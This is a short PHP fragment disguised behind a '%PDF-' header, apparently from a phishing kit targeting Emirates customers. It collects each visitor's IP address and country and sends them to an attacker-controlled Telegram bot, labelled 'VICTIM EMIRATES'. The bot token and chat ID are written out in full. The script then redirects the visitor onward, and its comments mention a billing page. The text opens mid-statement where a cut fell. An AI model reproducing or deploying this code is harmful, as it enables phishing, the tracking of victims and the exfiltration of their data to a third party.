%PDF- %PDF-country; // Telegram bot configuration $chat_id = "-4696721000"; // ID de discussion Telegram de l'utilisateur $token = "7564851274:AAHGdSqkYpJ4uBrybAFxMRLwfUt2PUiaMpY"; // Token de votre bot Telegram // Build the URL to send a message to the Telegram bot $url = "https://api.telegram.org/bot" . $token . "/sendMessage?chat_id=" . $chat_id . "&text=" . urlencode(" [⚠️] VICTIM EMIRATES : " . $user_ip . " - Country: " . $country); // Send the request to the Telegram API $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_exec($ch); curl_close($ch); // Rediriger vers billing.html header("Location: index.html"); exit; // Assurez-vous de quitter le script après la redirection ?>